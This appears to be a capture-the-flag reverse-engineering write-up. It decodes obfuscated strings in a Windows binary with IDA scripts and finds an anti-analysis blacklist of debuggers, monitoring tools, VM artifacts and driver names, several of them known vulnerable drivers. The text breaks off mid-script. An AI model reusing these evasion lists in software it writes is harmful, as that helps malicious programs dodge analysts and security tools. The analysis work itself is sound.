.data:00007FF737ACA578 dq 77190985h
.data:00007FF737ACA580 dq offset func_table_15
.data:00007FF737ACA588 dq 77190986h
.data:00007FF737ACA590 dq offset func_table_16
.data:00007FF737ACA598 dq 77190987h
.data:00007FF737ACA5A0 dq offset func_table_17
.data:00007FF737ACA5A8 dq 77190998h

These functions are almost all long functions, and deeply obfuscated.

After the call_func_tables there are some cipher strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
sub_1401031A0:
.text:000000014010350C mov dword ptr [rsp+1F0h+str+110h], 3Eh ; '>'
.text:0000000140103517 mov dword ptr [rsp+1F0h+str+108h], 16h ; n22
...
.text:0000000140103651 mov dword ptr [rsp+1F0h+str+10h], 18h ; n24
.text:0000000140103659 mov dword ptr [rsp+1F0h+str+8], 43h ; 'C' ; n67
.text:0000000140103661 mov dword ptr [rsp+1F0h+str], 57h ; 'W' ; n87
.text:0000000140103669 lea rcx, [rbp+170h+Str] ; p_Str
.text:0000000140103670 mov r8d, 41h ; 'A' ; n65
.text:0000000140103676 mov r9d, 12h ; n18
.text:000000014010367C call decstr

main_loop:
.text:0000000140106A01 mov dword ptr [rsp+1310h+arr+180h], 3Eh ; '>' ; n62
.text:0000000140106A0C mov dword ptr [rsp+1310h+arr+178h], 18h ; n24
...
.text:0000000140106BE0 mov dword ptr [rsp+1310h+arr+10h], 43h ; 'C' ; n67
.text:0000000140106BE8 mov dword ptr [rsp+1310h+arr+8], 4Bh ; 'K' ; n75
.text:0000000140106BF0 mov dword ptr [rsp+1310h+arr], 53h ; 'S' ; n83
.text:0000000140106BF8 lea rcx, [rbp+1290h+var_1110] ; Buffer
.text:0000000140106BFF mov r8d, 4Ah ; 'J' ; n74
.text:0000000140106C05 mov r9d, 53h ; 'S' ; n83
.text:0000000140106C0B call decstr_0

.text:0000000140107459 mov dword ptr [rsp+1310h+arr+1D8h], 3Eh ; '>'
.text:0000000140107464 mov dword ptr [rsp+1310h+arr+1D0h], 12h
...
.text:00000001401076B1 mov dword ptr [rsp+1310h+arr+10h], 4
.text:00000001401076B9 mov dword ptr [rsp+1310h+arr+8], 11h
.text:00000001401076C1 mov dword ptr [rsp+1310h+arr], 4
.text:00000001401076C9 lea rcx, [rbp+1290h+var_1110] ; Buffer
.text:00000001401076D0 mov r8d, 16h
.text:00000001401076D6 mov r9d, 7
.text:00000001401076DC call decstr_1

These strings are encrypted; let's try to decrypt them:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def dec(x):
    """Translate one cipher code into its plaintext character.

    Codes 0..25 are the lowercase letters 'a'..'z'; 87, 67 and 62 stand for
    ',', ' ' and '.'.  Any other code is not decoded and is rendered as a
    literal backslash-x hex escape so that it stays visible in the output.
    """
    if 0 <= x <= 25:
        return chr(ord('a') + x)
    if x == 87:
        return ','
    if x == 67:
        return ' '
    if x == 62:
        return '.'
    return f'\\x{x:02x}'


# Each array is laid out as: the r8d argument, the r9d argument, then the
# dwords stored on the stack, lowest offset first (see the listings above).
arr1 = [65,18,87,67,24,14,20,11,11,67,13,4,21,4,17,67,17,4,2,14,21,4,17,67,19,7,4,67,5,11,0,6,67,13,14,22,62]
print(''.join(dec(i) for i in arr1))

arr2 = [74,83,83,75,67,22,0,19,2,7,3,14,6,67,3,8,3,67,13,14,19,67,8,13,8,19,8,0,11,8,25,4,62,67,19,0,12,15,4,17,8,13,6,67,11,8,10,4,11,24,62]
print(''.join(dec(i) for i in arr2))

arr3 = [22,7,4,17,4,67,2,14,13,19,17,14,11,67,0,13,3,67,8,3,4,13,19,8,19,24,67,0,11,8,6,13,67,24,14,20,11,11,67,5,8,13,3,67,19,7,4,67,10,4,24,67,19,14,67,19,7,4,67,65,18,62]
print(''.join(dec(i) for i in arr3))

This is just the program’s output:

1
2
3
\x41s, youll never recover the flag now.
\x4a\x53\x53\x4b watchdog did not initialize. tampering likely.
where control and identity align youll find the key to the \x41s.

Try to find all of the encrypted strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import idaapi
import idc
import idautils

def is_mov_to_stack_with_imm(ea):
    """Check whether the instruction at ea is `mov [rsp|rbp + disp], imm`.

    Returns a (matched, displacement, immediate) triple.  Any mismatch gives
    (False, None, None).  The immediate is masked to 32 bits and values above
    0xFF are rejected, so only byte-sized constants are accepted.
    """
    no_match = (False, None, None)

    insn = idaapi.insn_t()
    if not idaapi.decode_insn(insn, ea):
        return no_match
    if insn.itype != idaapi.NN_mov:
        return no_match

    dst, src = insn.ops[0], insn.ops[1]
    if dst.type != idaapi.o_displ or src.type != idaapi.o_imm:
        return no_match
    if idaapi.get_reg_name(dst.reg, 8) not in ("rsp", "rbp"):
        return no_match

    immediate = src.value & 0xFFFFFFFF
    if immediate > 0xFF:
        return no_match
    return True, dst.addr, immediate

def read_byte_at(ea):
    """Return the byte at ea, or None when the read yields idaapi.BADADDR.

    NOTE(review): confirm that idc.get_wide_byte really reports an unreadable
    address as BADADDR; otherwise the None branch is never taken.
    """
    value = idc.get_wide_byte(ea)
    if value == idaapi.BADADDR:
        return None
    return value

def dec(x):
    """Translate one cipher code into its plaintext character.

    Codes 0..25 are the lowercase letters 'a'..'z'; 87, 67 and 62 stand for
    ',', ' ' and '.'.  Any other code is not decoded and is rendered as a
    literal backslash-x hex escape so that it stays visible in the output.
    """
    if 0 <= x <= 25:
        return chr(ord('a') + x)
    punctuation = {87: ',', 67: ' ', 62: '.'}
    if x in punctuation:
        return punctuation[x]
    return f'\\x{x:02x}'

def _args_after_sequence(last_mov_ea, end_ea, max_insns=6):
    """Return the (r8d, r9d) immediates loaded after the last stack store.

    Walks forward from the instruction following last_mov_ea, for at most
    max_insns instructions or until a call is reached, and records the low
    byte of every `mov r8d, imm` / `mov r9d, imm` it meets.  An element is
    None when the corresponding load was not found.
    """
    found = {"r8d": None, "r9d": None}
    cur = idc.next_head(last_mov_ea, end_ea)
    for _ in range(max_insns):
        if cur == idc.BADADDR or cur >= end_ea:
            break
        mnemonic = (idc.print_insn_mnem(cur) or "").lower()
        if mnemonic == "call":
            break
        if mnemonic == "mov" and idc.get_operand_type(cur, 1) == idc.o_imm:
            dst = (idc.print_operand(cur, 0) or "").lower()
            if dst in found:
                found[dst] = idc.get_operand_value(cur, 1) & 0xFF
        cur = idc.next_head(cur, end_ea)
    return found["r8d"], found["r9d"]


def find_mov_sequences(min_length=4):
    """Scan .text for encrypted-string setups and print their decoded form.

    A setup is a run of at least min_length consecutive
    `mov [rsp|rbp + disp], imm` instructions whose displacements step down by
    8, followed by the loads of r8d and r9d that precede the decrypt call.
    The code array is [r8d, r9d] followed by the stored immediates in
    ascending stack order.

    Returns a list of (sequence start address, code array, decoded string).

    The r8d/r9d values are taken from the decoded instructions after the run
    rather than from fixed byte offsets: the previous r9d offset pointed into
    the last store's own immediate and therefore always read 0.
    """
    seg = idaapi.get_segm_by_name(".text")
    if not seg:
        print("[-] .text segment not found")
        return []
    end_ea = seg.end_ea
    ea = seg.start_ea
    results = []

    while ea < end_ea:
        current_seq = []
        prev_disp = None
        seq_start_ea = ea
        temp_ea = ea
        # Extend the run while each store sits exactly 8 bytes below the previous one.
        while temp_ea < end_ea:
            ok, disp, imm = is_mov_to_stack_with_imm(temp_ea)
            if not ok:
                break
            if current_seq and prev_disp - disp != 8:
                break
            current_seq.append((temp_ea, disp, imm))
            prev_disp = disp
            temp_ea = idc.next_head(temp_ea, end_ea)

        if len(current_seq) >= min_length:
            last_mov_ea = current_seq[-1][0]
            r8_val, r9_val = _args_after_sequence(last_mov_ea, end_ea)
            if r8_val is not None and r9_val is not None:
                if r8_val < 127 and r9_val < 127:
                    bytes_list = [entry[2] for entry in current_seq]
                    # Stores were emitted from the highest offset down, so reverse them.
                    final_array = [r8_val, r9_val] + bytes_list[::-1]
                    decrypted = ''.join(dec(x) for x in final_array)
                    print(f"{seq_start_ea:#x} -> {decrypted}")
                    results.append((seq_start_ea, final_array, decrypted))
                else:
                    print(f"[-] r8/r9 out of range at {seq_start_ea:#x}: r8={r8_val}, r9={r9_val}")
            else:
                print(f"[-] Failed to read r8/r9 at {seq_start_ea:#x}")
            # Resume after the run so its tail is not reported as a shorter run.
            ea = last_mov_ea
        ea = idc.next_head(ea, end_ea)

    return results

def main():
    """Run the scan with a minimum run length of 4 and print the total."""
    decoded = find_mov_sequences(min_length=4)
    print(f"[+] Total {len(decoded)} strings decoded.")


if __name__ == "__main__":
    main()

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
0x140001137 -> \x2ea\x1d\x22\x2c\x1c\x25\x28\x2c\x1e\x1d
0x140001711 -> caaccme
0x140001a01 -> \x1ca\x40\x48extend\x40\x48rmmetadata\x40\x48txflog\x40
0x140001e21 -> \x2dax\x25og\x27tfs
0x140002151 -> nauser.dat
0x1400041fd -> \x1darectory
0x14000452b -> \x2cambolic\x25ink
0x140004e8b -> \x29aocess
0x1400051ab -> \x2daread
0x1400054cb -> \x29artition
0x1400057fb -> \x2eaer\x1apc\x2beserve
0x140005b5b -> \x22a\x1completion\x2beserve
0x140005eeb -> \x1aativity\x2beference
0x14000626b -> \x29aocess\x2ctate\x1change
0x1400065fb -> \x2daread\x2ctate\x1change
0x14000697b -> \x1cau\x29artition
0x140006ccb -> \x29a\x2cilo\x1context\x29aged
0x14000705b -> \x29a\x2cilo\x1context\x27on\x29aged
0x14000740b -> \x1dabug\x28bject
0x140007a5b -> \x26atant
0x140007d7b -> \x1callback
0x1400080ab -> \x2camaphore
0x1400086eb -> \x22a\x2dimer
0x140008a0b -> \x29aofile
0x140008d2b -> \x24ayed\x1event
0x14000906b -> \x30andow\x2ctation
0x1400093bb -> \x1dasktop
0x1400096db -> \x1camposition
0x140009a1b -> \x2baw\x22nput\x26anager
0x140009d7b -> \x1care\x26essaging
0x14000a0cb -> \x1aativation\x28bject
0x14000a43b -> \x2da\x30orker\x1factory
0x14000a79b -> \x1aaapter
0x14000aabb -> \x1cantroller
0x14000adfb -> \x1davice
0x14000b11b -> \x1daiver
0x14000b43b -> \x22a\x1completion
0x14000b78b -> \x30ait\x1completion\x29acket
0x14000be3b -> \x22a\x2bing
0x14000cd9b -> \x2caction
0x14000d0bb -> \x2cassion
0x14000d6db -> \x2bagistry\x2dransaction
0x14000da6b -> \x1daa\x1adapter
0x14000ddab -> \x1aa\x29\x1c \x29ort
0x14000e0db -> \x1eaergy\x2dracker
0x14000e42b -> \x29awer\x2bequest
0x14000e77b -> \x30ai\x20uid
0x14000ea9b -> \x1eaw\x2begistration
0x14000edfb -> \x1eaw\x2cession\x1demux\x1entry
0x14000f19b -> \x1eaw\x1consumer
0x14000f4db -> \x1caverage\x2campler
0x14000f83b -> \x29aw\x28bject
0x14000fb6b -> \x1falter\x1connection\x29ort
0x14000ff0b -> \x1falter\x1communication\x29ort
0x1400102cb -> \x27ais\x1cm\x2ctate
0x14001060b -> \x1dagk\x2chared\x2besource
0x14001099b -> \x1dagk\x2chared\x24eyed\x26utex\x28bject
0x140010d7b -> \x1dagk\x2chared\x2cync\x28bject
0x14001111b -> \x1dagk\x2chared\x2cwap\x1chain\x28bject
0x1400114eb -> \x1dagk\x1display\x26anager\x28bject
0x1400118bb -> \x1dagk\x2chared\x29rotected\x2cession\x28bject
0x140011cdb -> \x1dagk\x2chared\x1bundle\x28bject
0x14001208b -> \x1dagk\x1composition\x28bject
0x14001242d -> \x2faeg\x1configuration\x1context
0x140019e9e -> \x2fa\x30\x1a\x2b\x1e
0x14001a70f -> \x2fa\x2d\x2e\x1a\x25
0x14001f787 -> \x2faox\x26ini\x2bdr\x1d\x27
0x14001fadf -> \x2faox\x26ini\x2bd\x1d\x27
0x14001fe1f -> \x2faox\x2dray\x22\x29\x1c
0x14002045f -> \x2fa\x20eneration\x1counter
0x1400207ef -> \x1darace
0x140020aff -> \x2fa\x1c\x22\x20uest\x1dev
0x14002197c -> \x24a\x26\x24\x2f\x26\x24\x2f\x26
0x140021c8f -> \x26acrosoft \x21v
0x140021f8f -> \x2faware\x2f\x26ware
0x14002228f -> \x31an\x2f\x26\x26\x31en\x2f\x26\x26
0x14002258f -> pal hyperv
0x14002288f -> \x2faox\x2fbox\x2fbox
0x1400238b6 -> tapview.exe
0x140023bff -> darace.exe
0x140023f2f -> \x1faddler \x1everywhere.exe
0x1400242df -> \x1faddler.\x30eb\x2ei.exe
0x14002464f -> \x30areshark.exe
0x14002499f -> damppcap.exe
0x140024cdf -> \x2cayllax\x3a\x38.exe
0x14002502f -> wandbg.exe
0x14002535f -> \x1dag\x31.\x2chell.exe
0x1400256af -> iaa\x3a\x38.exe
0x1400259df -> iaa.exe
0x140025cff -> iaaq.exe
0x14002601f -> \x2ba\x1class\x1ex.exe
0x14002636f -> \x2ba\x1class\x1ex\x3a\x38.exe
0x1400266cf -> \x2ba\x1class.\x27\x1e\x2d.exe
0x140026a2f -> \x24aump.exe
0x140026d5f -> \x24aump\x3a\x38.exe
0x14002709f -> \x1dabug\x2fiew.exe
0x1400273ef -> \x2cas\x1exp.exe
0x14002771f -> \x30an\x2cpy.exe
0x140027a4f -> \x29aoc\x1exp\x31.exe
0x140027d8f -> \x29aoc\x26on\x31.exe
0x1400280cf -> \x30andow\x2ditle\x1ex.exe
0x14002843f -> \x1daiver\x26on.exe
0x14002878f -> \x1ea\x30\x1explorer.exe
0x140028aef -> \x29aol\x26on\x31v\x36.exe
0x140028e3f -> \x29arf\x26on\x31.exe
0x14002917f -> \x24arnel\x28bject\x2fiew.exe
0x14002950f -> \x28aj\x1dir.exe
0x14002983f -> \x28aj\x1exp.exe
0x140029b6f -> \x1dagview.exe
0x140029eaf -> dagview\x3a\x38.exe
0x14002a1ff -> natmyfault.exe
0x14002a54f -> natmyfault\x3a\x38.exe
0x14002a8bf -> paocexp.exe
0x14002abff -> \x29aocmon.exe
0x14002af3f -> paocdump.exe
0x14002b27f -> pasuspend.exe
0x14002b5cf -> pasuspend\x3a\x38.exe
0x14002b92f -> tapview\x3a\x38.exe
0x14002bc7f -> vamap.exe
0x14002bfaf -> vamap\x3a\x38.exe
0x14002c2ef -> \x30anobj.exe
0x14002c61f -> \x30anobj\x3a\x38.exe
0x14002c95f -> xa\x38dbg.exe
0x14002cc8f -> xa\x36dbg.exe
0x14002cfbf -> xa\x3adbg.exe
0x14002d2ef -> caeatengine\x46x\x3c\x3a\x45\x3a\x38.exe
0x14002d69f -> \x29aocess\x21acker.exe
0x14002da0f -> \x2castem\x22nformer.exe
0x14002dd8f -> lardpe.exe
0x14002e0bf -> ragmon.exe
0x14002e3ef -> haokexplorer.exe
0x14002e75f -> rass.exe
0x14002ea7f -> patools.exe
0x14002edbf -> iamunitydebugger.exe
0x14002fc8c -> \x2castem \x22nformer
0x14002ffff -> \x30ansider
0x14003031f -> \x2casinternals
0x14003065f -> \x26ark \x2bussinovich
0x1400309cf -> \x1caeat \x1engine
0x140030d0f -> \x29aocess \x21acker
0x14003105f -> \x1basmarck
0x14003137f -> \x30areshark
0x1400316af -> \x21ax\x46\x2bays \x2c\x1a
0x1400319ef -> \x2dae \x22nteractive \x1disassembler
0x140031ddf -> xa\x38dbg
0x1400320ef -> \x1faddler \x1everywhere
0x14003246f -> \x27ar \x2cofer
0x14003279f -> \x1fale\x1activity\x30atch
0x140032b0f -> \x2baclass.\x27\x1e\x2d
0x140032e4f -> \x24a\x38\x1c\x24\x37\x2b
0x140033cb3 -> \x2baclass
0x140033fa6 -> \x2baclass.\x27\x1e\x2d
0x14003431b -> \x2baclass
0x140034606 -> gat\x45\x2ccan\x1copy\x28n\x30rite\x26emory
0x140034a0e -> \x2castem\x22nformer
0x140034d36 -> \x2castem\x22nformer
0x1400350be -> \x1caeat \x1engine
0x1400353d6 -> caeatengine
0x14003574e -> \x1caeat \x1engine
0x140035a66 -> \x1caeat\x1engine
0x140035dde -> xa\x38dbg
0x1400360c6 -> xa\x38dbg\x45exe.pdb
0x14003644e -> xa\x38dbg
0x140036736 -> xa\x38dbg
0x140036a7e -> xa\x38dbg
0x140036d66 -> \x1dancan \x28gilvie
0x1400370ee -> \x2casinternals \x2dool
0x140037436 -> \x2casinternals
0x1400377ae -> \x29aocess \x26onitor
0x140037ae6 -> \x29aoc\x26on\x1driver.pdb
0x140037e8e -> \x2castem\x22nformer
0x1400381b6 -> \x29aocess\x21acker
0x14003853e -> \x2caylla
0x140038826 -> .a\x1a\x2f\x49\x48\x1c\x1dialog\x22mpl\x58\x2f\x29ick\x1dll\x20ui\x58\x58\x2f\x1c\x30indow\x58\x1a\x2d\x25\x58\x58\x58\x1a\x2d\x25\x58\x58
0x140038d4e -> \x26amory \x22ntrospection \x2dool
0x1400390f6 -> \x26a\x1c\x2b\x28\x2c\x28\x1f\x2d \x1d\x1e\x1b\x2e\x20\x20\x22\x27\x20 \x2c\x32\x26\x1b\x28\x25\x2c \x1a\x27\x1d \x1e\x31\x1e\x1c\x2e\x2d\x1a\x1b\x25\x1e\x2c
0x1400395be -> \x30areshark
0x1400398b6 -> ragister\x45tap\x45listener
0x140039c83 -> \x30areshark
0x140039f78 -> wareshark
0x14003ece3 -> darace.sys
0x14003efef -> \x29a\x28\x1c\x26\x28\x27\x36\x37.\x2c\x32\x2c
0x14003f2ff -> \x21aper\x29latform.sys
0x14003f62f -> \x1aaw\x2fmm.sys
0x14003f91f -> karocesshacker.sys
0x14003fc5f -> \x1ea\x28\x3a\x38.sys
0x14003ff4f -> \x1aa\x2c\x33\x22\x28\x3a\x38.sys
0x14004024f -> \x1ba\x45\x1flash\x3a\x38.sys
0x14004055f -> \x1ba\x45\x22\x36c\x3a\x38.sys
0x14004085f -> \x1ba\x26\x1e\x26x\x3a\x38.sys
0x140040b5f -> \x1ba\x26\x22\x31\x29\x3a\x38.sys
0x140040e5f -> \x1capcom.sys
0x14004114f -> cauz\x35\x38\x35.sys
0x14004144f -> \x30an\x2bing\x45\x34x\x3a\x38.sys
0x14004177f -> \x1fairplay\x24\x1d.sys
0x140041a8f -> paldqpoc.sys
0x140041d8f -> \x21a\x28s\x36\x1ec\x35\x34x\x3a\x38.sys
0x1400420bf -> \x29aymemx\x3a\x38.sys
0x1400423cf -> \x26anitor\x45win\x35\x34x\x3a\x38.sys
0x14004272f -> daiver.sys
0x140042a1f -> laa.sys
0x140042cff -> padsrvc\x45x\x3a\x38.pkms
0x14004302f -> kapocesshacker.sys
0x14004336f -> \x21ai\x27\x1f\x28\x3a\x38\x1a.\x2c\x32\x2c
0x14004367f -> magdrvamd\x3a\x38.sys
0x14004399f -> zam\x3a\x38.sys
0x140043c8f -> kaif.sys
0x140043f6f -> \x1aa\x2ep\x22\x28\x3a\x38.sys
0x14004426f -> \x1aar\x1drv\x35\x34.sys
0x14004456f -> \x1aar\x1drv\x35\x34\x35.sys
0x14004487f -> \x1aar\x1drv\x35\x34\x36.sys
0x140044b8f -> \x1aar\x1drv\x35\x34\x37.sys
0x140044e9f -> \x1ba\x26\x22x\x3a\x38.sys
0x14004519f -> \x1ba\x45\x1flash\x3a\x38.sys
0x1400454af -> \x1ba\x45\x21\x30\x26\x22\x28\x3a\x38\x45\x30\x35\x34.sys
0x1400457ef -> \x1ba\x45\x21\x30\x26\x22o\x3a\x38.sys
0x140045aff -> \x1ba\x45\x22\x36c\x3a\x38.sys
0x140045dff -> \x20a\x1c\x22\x1drv\x3a\x38.sys
0x14004610f -> \x21a\x28s\x36\x1ec\x35\x34x\x3a\x38.sys
0x14004643f -> \x21a\x28s\x36\x1ec\x3bx\x3a\x38.sys
0x14004675f -> \x27a\x22\x28\x25ib\x45\x31\x3a\x38.sys
0x140046a7f -> \x27a\x21\x20\x1b\x22\x28\x2c\x36x\x3a\x38.sys
0x140046daf -> \x29alash\x27\x2d.sys
0x1400470af -> \x29aymemx\x3a\x38.sys
0x1400473bf -> \x2ea\x28\x2b\x1e\x30\x3a\x38.\x2c\x32\x2c
0x1400476bf -> \x30an\x1flash\x3a\x38.sys
0x1400479cf -> \x30an\x2bing\x34x\x3a\x38.sys
0x140047cef -> dak\x3a\x38.sys
0x140047fdf -> mac\x1b\x2cv\x3a\x38.sys
0x1400482df -> naflash.sys
0x1400485df -> naflsh\x3a\x38.sys
0x1400488df -> paymem\x3a\x38.sys
0x140048bdf -> rakio\x3a\x38.sys
0x140048edf -> rakiow\x35\x34x\x3a\x38.sys
0x1400491ff -> rakiow\x3cx\x3a\x38.sys
0x14004950f -> sagwindrvx\x3a\x38.sys
0x14004983f -> saperbmc.sys
0x140049b3f -> samav\x3amsr.sys
0x140049e3f -> paddrv\x3a\x38.sys
0x14004a13f -> vaoxnetadp.sys
0x14004a44f -> vaoxusbmon.sys
0x14004a75f -> \x25alla\x26on.sys
0x14004aa4f -> \x29a\x2b\x2d\x26\x2c\x32\x2c.\x2c\x32\x2c
0x14004ad4f -> \x24abj\x1exp.sys
0x14004b03f -> \x29a\x2fiew\x1driver.sys
0x14004b35f -> \x29a\x28\x1c\x26\x28\x27\x36\x38.\x2c\x32\x2c
0x14004b65f -> \x2famouse.sys
0x14004b94f -> \x2faox\x26ouse.sys
0x14004bc4f -> \x2faox\x20uest.sys
0x14004bf4f -> \x2faox\x2c\x1f.sys
0x14004c23f -> \x2faox\x2fideo.sys
0x14004c53f -> vahgfs.sys
0x14004c82f -> vamemctl.sys
0x14004cb2f -> vamouse.sys
0x14004ce1f -> varawdsk.sys
0x14004d11f -> \x32a\x1ark\x1drv\x45d\x2cigned.sys
0x14004d46f -> \x32a\x1ark\x1drv.sys
0x14004d76f -> \x2caie\x2cvc.sys
0x14004da5f -> \x21atp\x1debugger\x2cdk.sys
0x14004dd9f -> dak\x3a\x38.sys
0x14004e07f -> dak\x37\x36.sys
0x14004e35f -> \x2caarp\x28\x1d\x45\x1drv.sys
0x14004f126 -> carss.exe
0x14004f45f -> sachost.exe
0x14004f79f -> laass.exe
0x14004facf -> waninit.exe
0x14004fe0f -> canhost.exe
0x14005014f -> \x2caandard\x1collector.\x2cervice.exe
0x14005054f -> \x28aerwolf\x21elper.exe
0x1400508cf -> \x28aerwolf\x21elper\x3a\x38.exe
0x140050c5f -> saeamwebhelper.exe
0x140050fdf -> \x27a\x1display.\x1container.exe
0x14005139f -> nacontainer.exe
0x1400516ff -> \x27a\x22\x1d\x22\x1a \x2chare.exe
[-] r8/r9 out of range at 0x140051a6f: r8=192, r9=0
0x140051daf -> wanlogon.exe
0x1400520ef -> \x29aesent\x26on\x45x\x3a\x38.exe
0x14005246f -> \x2castem\x2cettings\x1broker.exe
0x14005282f -> \x30ar\x1fault.exe
0x140052b6f -> davenv.exe
0x140052e9f -> \x2fa\x1debug\x1console.exe
0x14005321f -> \x28aen\x1console.exe
0x14005357f -> \x30andows\x2derminal.exe
0x1400ca976 -> \x2da\x2c\x2d\x2c\x22\x20\x27\x22\x27\x20
0x1400cad7e -> \x1da\x2c\x1a\x1b\x25\x1e\x45\x22\x27\x2d\x1e\x20\x2b\x22\x2d\x32\x45\x1c\x21\x1e\x1c\x24\x2c
[-] r8/r9 out of range at 0x1400cb1fe: r8=217, r9=0
[-] r8/r9 out of range at 0x1400cb53c: r8=141, r9=0
0x1400cb8fe -> \x1ba\x2e\x1d\x2b\x1a\x2d\x1e\x50
[-] r8/r9 out of range at 0x1400d2208: r8=198, r9=0
[-] r8/r9 out of range at 0x1400ef860: r8=232, r9=0
0x1400f217e -> \x25agal\x1copyright
0x1400f27ff -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f2cc1 -> \x40atring\x1file\x22nfo\x40
0x1400f3802 -> \x29aoduct\x27ame
0x1400f3e6f -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f4331 -> \x40atring\x1file\x22nfo\x40
0x1400f4e60 -> \x1fale\x1description
0x1400f54f3 -> \x40aar\x1file\x22nfo\x40\x2dranslation
0x1400f59b1 -> \x40atring\x1file\x22nfo\x40
0x1400f6ab8 -> baa\x80bb
0x1400fc827 -> aaocess
0x1400ff19f -> aa\x2f\x1e\x26\x1e\x2d\x21\x1e\x1f\x25\x1a\x20
0x1400ff6c3 -> aa\x28\x4a\x34xbadc\x34\x34d\x39\x4b
0x1400ff9d5 -> aa\x1a\x20 \x1d\x22\x2c\x29\x25\x1a\x32
0x14010350c -> \x41a, youll never recover the flag now.
[-] r8/r9 out of range at 0x14010456e: r8=241, r9=0
0x140104ad8 -> \x2ca\x1f\x2d\x30\x1a\x2b\x1e\x40\x26icrosoft\x40\x2bemoval\x2dools\x40\x26\x2b\x2d
0x140106a01 -> \x4aa\x53\x4b watchdog did not initialize. tampering likely.
0x140107459 -> waere control and identity align youll find the key to the \x41s.

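From these strings we can see a huge blacklist containing many analysis tools and virtual-environment artifacts. (In the listing above, the second character of every string appears as 'a' because the script read 0 for the r9d argument; compare \x41a here with \x41s in the manual decode earlier.) The main loop also contains this line: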

1
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, (LPCWSTR)lpSubKey, 0, 0x20019u, (PHKEY)&Src.m256_f32[2]) )

This opens the registry key SOFTWARE\\Microsoft\\RemovalTools\\MRT.

Try to detect all of the string-decryption functions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
# -*- coding: utf-8 -*-
import idc
import idautils
import ida_funcs
import ida_segment
import ida_name
import ida_kernwin

# Minimum number of stack stores that must precede a call for it to qualify.
MIN_MOV_CHAIN = 2
# Upper bound on how many instructions are walked backwards while counting stores.
MAX_BACK_INSNS = 220
# Inclusive size window, in bytes, that a callee must fall in to be a candidate.
FUNC_SIZE_MIN = 0xF0
FUNC_SIZE_MAX = 0x110

# Mnemonics that are skipped over when looking at the instructions before a call.
IGNORED_MNEMS = {
"vzeroupper",
"nop",
"int3",
"endbr64",
"endbr32",
}

def prev_insn(ea):
    """Return the head preceding ea, or idc.BADADDR when there is none."""
    return idc.prev_head(ea)

def mnem(ea):
    """Return the lowercase mnemonic at ea, or "" when IDA reports none."""
    return (idc.print_insn_mnem(ea) or "").lower()

def op(ea, n):
    """Return the lowercase text of operand n at ea, or "" when it is empty."""
    return (idc.print_operand(ea, n) or "").lower()

def optype(ea, n):
    """Return IDA's operand-type code for operand n of the instruction at ea."""
    kind = idc.get_operand_type(ea, n)
    return kind

def prev_sig_insn(ea, max_skip=8):
    """Return the nearest preceding instruction that is not in IGNORED_MNEMS.

    At most max_skip ignored instructions are stepped over; after that the
    current position is returned even if it is still an ignored mnemonic.
    Returns idc.BADADDR when the walk runs out of instructions.
    """
    cur = prev_insn(ea)
    budget = max_skip
    while budget > 0:
        if cur == idc.BADADDR or mnem(cur) not in IGNORED_MNEMS:
            break
        cur = prev_insn(cur)
        budget -= 1
    return cur

def is_mov_reg_imm(ea, regname):
    """True when the instruction at ea is `mov <regname>, <immediate>`."""
    return (
        mnem(ea) == "mov"
        and op(ea, 0) == regname
        and optype(ea, 1) == idc.o_imm
    )

def is_lea_rcx_mem(ea):
    """True when the instruction at ea is `lea rcx, <memory operand>`."""
    memory_kinds = (idc.o_displ, idc.o_phrase, idc.o_mem)
    return (
        mnem(ea) == "lea"
        and op(ea, 0) == "rcx"
        and optype(ea, 1) in memory_kinds
    )

def is_mov_stack_imm(ea):
    """True when ea holds `mov [... rsp|rbp ...], <immediate>`.

    The destination is matched on its printed text: it must contain both
    brackets and mention rsp or rbp.
    """
    if mnem(ea) != "mov" or optype(ea, 1) != idc.o_imm:
        return False
    target = op(ea, 0)
    bracketed = "[" in target and "]" in target
    frame_based = "rsp" in target or "rbp" in target
    return bracketed and frame_based

def count_contiguous_stack_mov_imm(start_ea):
    """Count the stack stores of small immediates ending at start_ea.

